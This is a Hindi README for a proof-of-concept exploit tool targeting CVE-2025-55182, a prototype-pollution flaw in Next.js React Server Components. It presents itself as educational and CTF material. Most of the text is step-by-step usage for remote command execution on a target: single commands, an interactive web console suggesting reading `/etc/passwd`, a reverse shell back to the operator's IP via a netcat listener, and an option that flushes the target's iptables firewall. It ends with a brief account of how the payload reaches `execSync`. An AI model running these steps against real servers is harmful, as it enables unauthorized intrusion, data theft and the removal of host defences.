
WEB-CLI_RCE_React2Shell CVE-2025-55182 के लिए एक शैक्षिक PoC एक्सप्लॉइट टूल है, जो React Server Components का उपयोग करने वाले Next.js अनुप्रयोगों में एक गंभीर Prototype Pollution दोष है। CTFs और शोध के लिए डिज़ाइन किया गया, इसमें RCE प्रदर्शित करने के लिए एक एकल-कमांड मोड, एक इंटरैक्टिव वेब CLI और रिवर्स शेल क्षमताएँ शामिल हैं।
यह टूल CVE-2025-55182 के लिए एक सरल Proof-of-Concept (PoC) exploit है। यह Next.js अनुप्रयोगों में पाया जाने वाला एक गंभीर दोष (Prototype Pollution) है, जो React Server Components का उपयोग करते हैं।
यदि कोई लक्षित सर्वर संवेदनशील है, तो यह स्क्रिप्ट आपको उस पर ऑपरेटिंग सिस्टम कमांड चलाने देती है (Remote Code Execution, या RCE)।
यह टूल सीखने, CTF और जिम्मेदार सुरक्षा अनुसंधान के लिए बनाया गया है।
नैतिक रूप से उपयोग करें। इस exploit को केवल उन्हीं सिस्टमों पर चलाएँ जिनके आप मालिक हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट, दस्तावेजित अनुमति है। अनधिकृत उपयोग अवैध है। यह टूल केवल शैक्षिक उद्देश्यों के लिए है।
इस टूल में कमांड चलाने के तीन मुख्य तरीके हैं: एक साधारण एकल कमांड, एक पूर्ण इंटरैक्टिव वेब कंसोल, और एक क्लासिक रिवर्स शेल का प्रयास।
कोड प्राप्त करें:
git clone https://github.com/raivenLockdown/WEB-CLI_RCE_React2Shell.git
cd REACT2SHELL
लाइब्रेरी इंस्टॉल करें:
pip install requests
यह लक्ष्य के साथ इंटरैक्ट करने का सबसे आसान तरीका है। यह आपकी मशीन पर एक स्थानीय वेब पेज शुरू करता है जो टर्मिनल की तरह कार्य करता है।
स्क्रिप्ट चलाएँ:
python3 exploit.py <TARGET_URL> --web-cli
उदाहरण: python3 exploit.py http://target.com/ --web-cli
अपना ब्राउज़र खोलें: स्क्रिप्ट आपको बताएगी कि http://127.0.0.1:8000/ खोलें। फिर आप सीधे वेब पेज पर कमांड (जैसे ls, whoami, cat /etc/passwd) टाइप कर सकते हैं।
एक कमांड चलाएँ और तुरंत अपने स्थानीय टर्मिनल में आउटपुट प्राप्त करें। अपना यूज़र ID खोजने जैसी त्वरित जाँच के लिए उपयोगी।
python3 exploit.py <TARGET_URL> --cmd '<COMMAND>'
उदाहरण: python3 exploit.py http://target.com/ --cmd 'id'
यदि आप एक स्थिर, सतत कनेक्शन चाहते हैं तो इस मोड का उपयोग करें। नोट: फ़ायरवॉल (egress filtering) के कारण यह वास्तविक-विश्व वातावरण में अक्सर विफल हो जाता है।
अपना लिसनर शुरू करें (जैसे, netcat):
nc -lvnp 55555
exploit चलाएँ:
python3 exploit.py <TARGET_URL> -i <YOUR_IP> -p 55555 [--flush]
-i <YOUR_IP>: आपकी मशीन का IP।-p 55555: आपका लिसनर जिस पोर्ट का उपयोग कर रहा है।--flush (वैकल्पिक): होस्ट फ़ायरवॉल साफ़ करने के लिए पहले लक्ष्य पर iptables -F चलाने का प्रयास करता है।यह exploit RCE प्राप्त करने के लिए एक Prototype Pollution दोष का उपयोग करता है।
Object.prototype) में गुण जोड़ सकते हैं।child_process का उपयोग करके)। हम उस गुण के मान को अपने शेल कमांड से बदल देते हैं।execSync) करवाता है और तुरंत एक हानिरहित त्रुटि फेंकता है। कमांड का आउटपुट चतुराई से त्रुटि संदेश के digest फ़ील्ड में डाल दिया जाता है। फिर Python स्क्रिप्ट परिणाम प्राप्त करने के लिए इस फ़ील्ड को पढ़ती है।यह शोध सुरक्षा समुदाय द्वारा किए गए प्रारंभिक कार्य और प्रकटीकरण पर निर्भर करता है। सभी शोधकर्ताओं और ओपन-सोर्स योगदानकर्ताओं को धन्यवाद।